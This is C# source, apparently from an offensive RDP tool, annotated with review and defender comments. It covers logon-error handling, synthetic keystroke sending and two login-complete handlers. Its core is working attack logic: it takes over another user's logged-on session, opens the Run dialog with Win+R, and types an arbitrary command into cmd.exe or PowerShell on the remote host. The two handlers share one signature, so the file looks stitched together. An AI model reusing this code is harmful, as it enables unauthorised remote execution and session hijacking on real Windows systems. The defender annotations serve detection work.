/// <summary>
/// Handles the RDP control's logon-error event: stores and prints the error code, then either
/// answers the "take over session" prompt with synthetic keystrokes or ends the process.
/// </summary>
/// <param name="sender">The control that raised the event; cast to <c>AxMsRdpClient9NotSafeForScripting</c> on the takeover path.</param>
/// <param name="e">Event data whose <c>lError</c> field carries the logon error code.</param>
/// <remarks>
/// Code -5 with <c>takeover</c> set drives the prompt; code -2 falls through with no action here;
/// every other code terminates the process.
/// NOTE(review): the process exits with status 0 even though logon failed, so a caller or log
/// pipeline cannot tell failure from success by exit code.
/// NOTE(review): the keystrokes are sent on fixed timers with no check that the prompt is actually
/// displayed; they land on whatever has focus in the remote session.
/// </remarks>
private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e)
{
    LogonErrorCode = e.lError;

    // The enum lookup is done on the unsigned form of the (possibly negative) code.
    var errorName = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode);
    Console.WriteLine("[-] Logon Error : {0} - {1}", LogonErrorCode, errorName);
    Thread.Sleep(1000);

    if (LogonErrorCode == -5 && takeover == true)
    {
        // The login-complete event is not raised on this path, so the key-sending
        // interface has to be obtained here.
        var session = (AxMsRdpClient9NotSafeForScripting)sender;
        Thread.Sleep(1000);
        keydata = (IMsRdpClientNonScriptable)session.GetOcx();

        Console.WriteLine("[+] Another user is logged on, asking to take over session");
        SendElement("Tab");
        Thread.Sleep(500);
        SendElement("Enter+down");
        Thread.Sleep(500);
        SendElement("Enter+up");
        Thread.Sleep(500);

        // The message says 30 seconds; the blocking wait is 31000 ms.
        Console.WriteLine("[+] Sleeping for 30 seconds");
        Task.Delay(31000).GetAwaiter().GetResult();

        Marshal.ReleaseComObject(session);
        Marshal.ReleaseComObject(keydata);
        return;
    }

    if (LogonErrorCode != -2)
    {
        Environment.Exit(0);
    }
}
/// <summary>
/// Sends a sequence of key presses to the RDP session behind <paramref name="serverBase"/> by
/// filling a <c>SendKeysData</c> buffer and passing it to <c>IMsRdpClientNonScriptable.SendKeys</c>.
/// </summary>
/// <param name="keyCodes">Key codes to send; only the first 10 are processed.</param>
/// <param name="serverBase">Supplies the server node whose client object exposes <c>GetOcx()</c>.</param>
/// <remarks>
/// Modifier keys are accumulated as key-down entries; when a non-modifier key is reached, key-up
/// entries for everything accumulated are appended in reverse order and the batch is sent.
/// Modifiers that are not followed by a non-modifier key are never sent.
/// NOTE(review): the empty catch silently discards any failure inside the try block (for example
/// from <c>SendKeys</c>), so the caller cannot tell whether input was delivered.
/// NOTE(review): up to 20 entries are written (9 modifiers + 1 key down, then 10 key-ups); the
/// size of the <c>keyData</c>/<c>keyUp</c> buffers is not visible here — confirm they hold at least 20.
/// </remarks>
public unsafe static void Send(Keys[] keyCodes, ServerBase serverBase)
{
    Server serverNode = serverBase.ServerNode;
    RdpClient client = serverNode.Client;
    IMsRdpClientNonScriptable msRdpClientNonScriptable = (IMsRdpClientNonScriptable)client.GetOcx();
    int num = keyCodes.Length;
    try
    {
        SendKeysData sendKeysData = default(SendKeysData);
        // Raw pointers to the start of the up/down flags and the key data; passed by ref to SendKeys below.
        // presumably keyUp is a fixed buffer of a non-bool element type, hence the cast — confirm against SendKeysData
        bool * ptr = (bool *)sendKeysData.keyUp;
        int * ptr2 = sendKeysData.keyData;
        // num2 = number of entries currently queued in the buffer.
        int num2 = 0;
        for (int i = 0; i < num && i < 10; i++)
        {
            // Map type 0u: presumably virtual-key -> scan code if Util.MapVirtualKey wraps the Win32 call — confirm.
            int num3 = (int)Util.MapVirtualKey((uint)keyCodes[i], 0u);
            // Queue the key-down entry (keyUp flag 0).
            sendKeysData.keyData[num2] = num3;
            sendKeysData.keyUp[num2++] = 0;
            if (!IsModifier(keyCodes[i]))
            {
                // Non-modifier reached: append a key-up (flag 1) for every queued key-down, last pressed first.
                for (int num4 = num2 - 1; num4 >= 0; num4--)
                {
                    sendKeysData.keyData[num2] = sendKeysData.keyData[num4];
                    sendKeysData.keyUp[num2++] = 1;
                }
                // Send the whole batch, then start a fresh one.
                msRdpClientNonScriptable.SendKeys(num2, ref *ptr, ref *ptr2);
                num2 = 0;
            }
        }
    }
    catch
    {
        // NOTE(review): all exceptions are swallowed here; nothing is logged or reported.
    }
}
/// <summary>
/// Handles the RDP control's login-complete event: obtains the key-sending interface, opens the
/// Run dialog in the remote session with a synthetic Win+R, hands off to the selected runner,
/// and disconnects.
/// </summary>
/// <param name="sender">The control that raised the event; cast to <c>AxMsRdpClient9NotSafeForScripting</c>.</param>
/// <param name="e">Unused.</param>
/// <remarks>
/// <c>execwith</c> selects the runner: "cmd" and "powershell"/"ps" go through <c>RunConsole</c>,
/// anything else through <c>RunRun</c>.
/// NOTE(review): every step is paced by fixed sleeps and nothing confirms the Run dialog opened,
/// so keystrokes go to whatever has focus in the remote session.
/// Defender note: this drives an interactive desktop rather than a service or remote-exec API;
/// text entered in the Run dialog is typically recorded in the user's RunMRU registry key and the
/// resulting process is typically a child of explorer.exe inside an RDP logon session — verify on
/// the target OS build.
/// </remarks>
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
{
    var session = (AxMsRdpClient9NotSafeForScripting)sender;
    Console.WriteLine("[+] Connected to : {0}", target);
    Thread.Sleep(1000);
    keydata = (IMsRdpClientNonScriptable)session.GetOcx();

    // -2 was recorded by the logon-error handler; wait longer while the new session is built.
    if (LogonErrorCode == -2)
    {
        Console.WriteLine("[+] User not currently logged in, creating new session");
        Task.Delay(10000).GetAwaiter().GetResult();
    }

    // Any non-empty runtype is reported as elevated.
    string privilegeLabel = runtype != string.Empty ? "elevated" : "non-elevated";
    Console.WriteLine("[+] Execution priv type : {0}", privilegeLabel);
    Thread.Sleep(1000);

    // Win+R press and release.
    SendElement("Win+R+down");
    Thread.Sleep(500);
    SendElement("Win+R+up");
    Thread.Sleep(1000);

    switch (execwith)
    {
        case "cmd":
            RunConsole("cmd.exe");
            break;
        case "powershell":
        case "ps":
            RunConsole("powershell.exe");
            break;
        default:
            RunRun();
            break;
    }

    Thread.Sleep(1000);
    Console.WriteLine("[+] Disconnecting from : {0}", target);
    session.Disconnect();
}
/// <summary>
/// Handles the RDP control's login-complete event: opens the Run dialog in the remote session
/// with a synthetic Win+R, types the lower-cased <c>cmd</c> value either directly or inside a
/// cmd.exe / powershell.exe console, and disconnects.
/// </summary>
/// <param name="sender">The control that raised the event; cast to <c>AxMsRdpClient9NotSafeForScripting</c>.</param>
/// <param name="e">Unused.</param>
/// <remarks>
/// NOTE(review): <c>cmd</c> is always passed through <c>ToLower()</c> before it is typed, so any
/// case-sensitive content in it is altered; the call is also culture-sensitive.
/// NOTE(review): the "cmd" and "powershell"/"ps" branches are identical apart from the console
/// name. Timing relies on fixed sleeps; nothing confirms the dialog or console actually opened.
/// Defender note: input arrives as keystrokes in an interactive RDP session, so the usual
/// artefacts are an RDP logon plus processes started from the Run dialog (typically under
/// explorer.exe) — verify against local telemetry.
/// </remarks>
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
{
    // -2 was recorded by the logon-error handler; give the new session time to come up.
    if (LogonErrorCode == -2)
    {
        Console.WriteLine("[+] User not currently logged in, creating new session");
        Task.Delay(10000).GetAwaiter().GetResult();
    }

    var session = (AxMsRdpClient9NotSafeForScripting)sender;
    Console.WriteLine("[+] Connected to : {0}", target);
    Thread.Sleep(1000);
    keydata = (IMsRdpClientNonScriptable)session.GetOcx();

    const string enterKeyDown = "Enter+down";
    const string enterKeyUp = "Enter+up";

    Thread.Sleep(1000);
    SendElement("Win+R+down");
    Thread.Sleep(500);
    SendElement("Win+R+up");
    Thread.Sleep(1000);

    // Lower-cased once; every branch below starts by using this value.
    string typedCommand = cmd.ToLower();

    switch (execwith)
    {
        case "cmd":
            Console.WriteLine("[+] Executing {0} from cmd.exe", typedCommand);
            SendText("cmd.exe");
            Thread.Sleep(1000);
            SendElement(enterKeyDown);
            Thread.Sleep(500);
            SendElement(enterKeyUp);
            Thread.Sleep(500);
            SendText(typedCommand);
            Thread.Sleep(1000);
            SendElement(enterKeyDown);
            Thread.Sleep(500);
            SendElement(enterKeyUp);
            Thread.Sleep(500);
            // "exit" is typed but no Enter follows it in this branch.
            SendText("exit");
            break;

        case "powershell":
        case "ps":
            Console.WriteLine("[+] Executing {0} from powershell.exe", typedCommand);
            SendText("powershell.exe");
            Thread.Sleep(1000);
            SendElement(enterKeyDown);
            Thread.Sleep(500);
            SendElement(enterKeyUp);
            Thread.Sleep(500);
            SendText(typedCommand);
            Thread.Sleep(1000);
            SendElement(enterKeyDown);
            Thread.Sleep(500);
            SendElement(enterKeyUp);
            Thread.Sleep(500);
            // "exit" is typed but no Enter follows it in this branch.
            SendText("exit");
            break;

        default:
            Console.WriteLine("[+] Executing {0}", typedCommand);
            SendText(typedCommand);
            Thread.Sleep(1500);
            SendElement(enterKeyDown);
            Thread.Sleep(500);
            SendElement(enterKeyUp);
            break;
    }

    Thread.Sleep(1000);
    Console.WriteLine("[+] Disconnecting from : {0}", target);
    session.Disconnect();
}